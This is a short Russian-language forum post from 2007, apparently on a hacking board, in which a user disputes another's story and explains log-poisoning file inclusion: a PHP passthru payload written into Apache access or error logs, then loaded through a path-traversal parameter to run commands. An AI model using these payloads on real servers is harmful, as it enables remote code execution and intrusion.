30.08.2007, 14:53
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
С нами:
10038327
Репутация:
251
|
|
Ты себя пойми для начало. Цитаты ты собрал с разных частей рассказа!!!
А вот и ответ на твой вопрос--> Инклуд в логах: http://xost.com/view.cgi?page=<?passthru($_GET[cmd]);?>,даная строчка записывается или в access_log ибо в errors_log, затем http://xost.com/view.cgi?page=../../../../../../../../../../../../usr/local/apache/logs/access_log?cmd=id
http://xost.com/view.cgi?page=../../../../../../../../../../../../usr/local/apache/logs/errors_log?cmd=id
Тут вроде все понятно с ходом моей мысли.
Код:
если кто не понял, поясню: если он хотел проинклюдить логи апача, то как он смог прочитать config.php... и это только пример противоречивости
Оказалось ,что я не просто могу читать , но и перемещаться по директориям на сервере ! |
|
|